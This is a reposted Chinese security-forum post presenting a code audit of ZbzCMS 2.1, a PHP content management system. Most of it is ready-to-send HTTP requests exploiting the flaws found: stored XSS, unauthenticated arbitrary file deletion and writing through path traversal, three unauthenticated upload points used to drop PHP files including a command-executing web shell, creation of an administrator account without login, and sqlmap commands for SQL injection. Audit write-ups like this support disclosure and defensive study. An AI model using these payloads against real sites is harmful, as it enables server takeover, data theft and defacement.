设为首页收藏本站
开启辅助访问 切换到窄版

安全矩阵

 找回密码
 立即注册
搜索
安全矩阵»安全矩阵 安全矩阵实验室 技术转载 某某CMS代码审计
返回列表 发新帖
查看: 2298|回复: 0

某某CMS代码审计

[复制链接]
Delina

855

主题

862

帖子

2940

积分

金牌会员

Rank: 6Rank: 6

积分
2940
发表于 2022-1-7 18:29:37 | 显示全部楼层 |阅读模式
原文链接:某某CMS代码审计

0x00 前言
ZbzCMS 2.1系统漏洞百出,只能说开发祭天,法力无边.
使用工具:Seay源代码审计系统,Nodepad++和Phpstudy
0x01 存储型 XSS
定位到一处存储Xss:

/cms/common/php/ajax.php
构造Payload:
  1. POST /cms/common/php/ajax.php?run=liuyan HTTP/1.1
  2. Host: x.x.x.x
  3. Connection: keep-alive
  4. Content-Length: 105Pragma: no-cache
  5. Cache-Control: no-cache
  6. Upgrade-Insecure-Requests: 1Origin: http://x.x.x.x
  7. Content-Type: application/x-www-form-urlencoded
  8. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
  9. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  10. Referer: http://x.x.x.x/cms/common/php/ajax.php?run=liuyan
  11. Accept-Encoding: gzip, deflate
  12. Accept-Language: zh-CN,zh;q=0.9diaoyongbiaoqian=hacker&neirong=<script>alert(what the hack)</script>&leixing=1.1.
复制代码



后台查看:

0x02 前台任意文件删除
定位到一处文件删除操作.

并且没有鉴权操作:

很简单的构造 不多说什么....... 可以配合重装漏洞Getshell
构造Payload :
POST /cms/cms/include/up.php?run=del HTTP/1.1
url=../../../ddd.jpg

0x03 前台任意文件上传
上传点1
定位到一处文件上传.


Payload:
​​

  1. POST /cms/cms/include/up.php?run=file&path=../../../&filename=1 HTTP/1.1
  2. Host: xxx
  3. Connection: keep-alive
  4. Content-Length: 211Pragma: no-cache
  5. Cache-Control: no-cache
  6. Accept: application/json, text/javascript, */*; q=0.01
  7. X-Requested-With: XMLHttpRequest
  8. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
  9. Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryU9A5BBZeovUxg3UP
  10. Origin: http://xxx
  11. Referer: http://xxx/cms/cms/admin/wenjian.php?path=../../..
  12. Accept-Encoding: gzip, deflate
  13. Accept-Language: zh-CN,zh;q=0.9

  15. ------WebKitFormBoundaryU9A5BBZeovUxg3UP
  16. Content-Disposition: form-data; name="0"; filename="info.php"Content-Type: application/octet-stream

  18. <?php phpinfo();?>
  19. ------WebKitFormBoundaryU9A5BBZe
复制代码



上传点2
/cms/cms/zbzedit/php/zbz.php
定义了一堆参数 并且没有进行鉴权操作 直接可导致任意文件上传Getshell

Payload:
  1. POST /cms/cms/zbzedit/php/zbz.php?run=uptxt&path=../../../&path_res=../../&data_pic_name=1 HTTP/1.1
  2. Host: x.x.x.x
  3. Connection: keep-alive
  4. Content-Length: 234
  5. Pragma: no-cache
  6. Cache-Control: no-cache
  7. Upgrade-Insecure-Requests: 1
  8. Origin: http://x.x.x.x
  9. Content-Type: application/x-www-form-urlencoded
  10. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
  11. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  12. Referer: http://x.x.x.x/cms/cms/zbzedit/php/zbz.php?run=uptxt&path=../../../&path_res=../../&data_pic_name=0
  13. Accept-Encoding: gzip, deflate
  14. Accept-Language: zh-CN,zh;q=0.9

  16. ------WebKitFormBoundaryol3qy7YKEOE2tHFq
  17. Content-Disposition: form-data; name="0"; filename="poc.php"
  18. Content-Type: text/plain

  20. <?php system("whoami");?>
  21. ------WebKitFormBoundaryol3qy7YKEOE2tHFq--
复制代码


上传即会给出路径,其中参数data_pic_name=0改名data_pic_name=1文件原名

上传点3
/cms/cms/admin/ajax.php 一样的未授权文件上传(不过这里不能控制改名)

Payload:
  1. POST /cms/cms/admin/ajax.php?run=youad_pic HTTP/1.1
  2. Host: x.x.x.x
  3. Connection: keep-alive
  4. Content-Length: 196
  5. Pragma: no-cache
  6. Cache-Control: no-cache
  7. Upgrade-Insecure-Requests: 1
  8. Origin: http://x.x.x.x
  9. Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMnkzsdthG7uKREBW
  10. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
  11. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  12. Referer: http://x.x.x.x/cms/cms/admin/ajax.php?run=youad_pic
  13. Accept-Encoding: gzip, deflate
  14. Accept-Language: zh-CN,zh;q=0.9

  16. ------WebKitFormBoundary0saNPreA1a0CHrrt
  17. Content-Disposition: form-data; name="1"; filename="ccc.php"
  18. Content-Type: text/plain

  20. <?php phpinfo();?>
  21. ------WebKitFormBoundary0saNPreA1a0CHrrt--
复制代码




0x04 前台未授权RCE
/cms/cms/admin/run_ajax.php
第461-470行文件编辑保存操作

传入Path neirong参数即可构成任意文件读写创建操作
Payload (写到根目录/ddd.php):
POST /cms/cms/admin/run_ajax.php?run=wenjian_edit HTTP/1.1
path=../../../ddd.php&neirong=<?php phpinfo();?>

0x05 前台未授权添加管理员
​​
这里看到一处操作(管理员添加编辑):

Payload :
POST /cms/cms/admin/run_ajax.php?run=admin HTTP/1.1
mima=123456&guanliyuan=hack

然后是登录不上后台的(等级不够),这里再通过Login函数创造Sessions.

POST /cms/cms/admin/run_ajax.php?run=login HTTP/1.1
guanliyuan=hack&pwd=123456

刷新即可登录后台.

0x06 前台Mysql盲注
注入点1对代码进行复审,即手工二次审计,发现/cms/common/php/ajax.php存在SQL注入.

传入id参数即可构成查询注入.

一把梭
​​

sqlmap -u "http://xxx/cms/common/php/ajax.php?run=ad&id=3" -p id

注入点2发现/cms/cms/include/make.php存在布尔盲注,时间盲注.

一把梭

sqlmap -u "http://xxx/cms/cms/include/make.php?t=1&php=2&art=2" -p art



回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2025-5-3 05:01 , Processed in 0.021071 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表